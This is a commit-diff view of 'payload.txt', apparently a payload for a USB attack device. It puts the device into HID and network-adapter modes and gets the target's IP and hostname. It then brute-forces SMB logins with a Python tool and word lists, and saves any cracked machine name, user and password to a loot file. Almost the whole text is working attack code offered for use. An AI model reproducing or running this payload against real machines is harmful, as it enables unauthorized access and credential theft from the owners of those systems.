Update payload.txt
parent
d9d741e828
commit
b3537e7a65
|
@ -16,13 +16,16 @@ ATTACKMODE HID RNDIS_ETHERNET
|
|||
mount /dev/nandf /root/udisk/
|
||||
GET TARGET_IP
|
||||
GET TARGET_HOSTNAME
|
||||
|
||||
# Perform SMB bruteforce attack
|
||||
LED STAGE1
|
||||
python $ORIGINAL_SWITCH/mmcbrute/mmcbrute.py -t $TARGET_IP -u $user_bruteforce_list -p $pass_bruteforce_list 2> $password_process_file
|
||||
|
||||
# Check for results
|
||||
LED STAGE2
|
||||
if grep -q "Success" $password_process_file; then
|
||||
LED G
|
||||
|
||||
# Extract and Store the loot, then quack it
|
||||
pass=$(cat $password_process_file | grep "./" | cut -d "/" -f 2 | cut -d ":" -f 2)
|
||||
echo "Machine: $TARGET_HOSTNAME - User: $user - Pass: $pass" >> $password_loot_file
|
||||
|
|
Loading…
Reference in New Issue